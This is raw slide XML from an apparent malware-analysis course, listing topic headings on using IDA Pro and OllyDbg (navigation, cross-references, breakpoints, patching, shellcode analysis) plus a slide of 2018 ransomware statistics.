              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="725" name="Google Shape;1376;p150" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876360" y="0"/>
            <a:ext cx="2243160" cy="1104120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727"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Navigating</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Link: double-click</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Cross-reference: XREF</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Exploring history: 🡺Forward/ 🡸 Backward buttons</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Navigation band: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0070c0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Light Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="7030a0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Dark Blue</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Jump: address, name, function, etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Search</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Next Code</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Text</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Sequence of Bytes</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="728" name="Google Shape;1383;p151" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876360" y="0"/>
            <a:ext cx="2243160" cy="1104120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="730"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Cross references - Xrefs</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Code Xrefs</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Data Xrefs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Analysing Functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="731" name="Google Shape;1391;p152" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683640" y="3429000"/>
            <a:ext cx="8280360" cy="3400200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="732" name="Google Shape;1392;p152" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876360" y="0"/>
            <a:ext cx="2243160" cy="1104120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734"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Graph</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="735" name="Google Shape;1399;p153" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3708000" y="1268640"/>
            <a:ext cx="2133000" cy="426240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="736" name="Google Shape;1400;p153" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467640" y="2349000"/>
            <a:ext cx="8475120" cy="3651120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="737" name="Google Shape;1401;p153" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876360" y="0"/>
            <a:ext cx="2243160" cy="1104120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739"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Patching</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IDA Pro allows to put comments, rename variables, etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Rename functions</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Rename variables</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Comments</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Format operands: hex, dec, etc.</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Using Name constant: </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Redefining code and data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="740" name="Google Shape;1409;p154" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876360" y="0"/>
            <a:ext cx="2243160" cy="1104120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="742"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Plug-in</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IDC script</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Python script</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Google Shape;1416;p155" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876360" y="0"/>
            <a:ext cx="2243160" cy="1104120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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OllyDbg</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="745" name="Google Shape;1424;p156" descr="OllyDbg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657160" y="87480"/>
            <a:ext cx="1050480" cy="1031760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746" name="Google Shape;1425;p156" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="48240" y="1109520"/>
            <a:ext cx="9031680" cy="5748120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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OllyDbg</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="75000"/>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Loading Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Memory map</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Viewing threads and stacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Executing code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Breakpoints</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Loading DLL</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Tracing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Exception handling</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Patching</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Analyzing shellcode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Assistance features</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Plug-ins</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-180720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-180720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-98640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="749" name="Google Shape;1433;p157" descr="OllyDbg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657160" y="87480"/>
            <a:ext cx="1050480" cy="103176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Security reports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137"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Crypto-ransomware</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2018: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>765 538 unique users attacked by encryptors</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Google Shape;204;p16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="2791080"/>
            <a:ext cx="6480360" cy="331020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Security reports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140"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Local infection </a:t>
            </a:r>
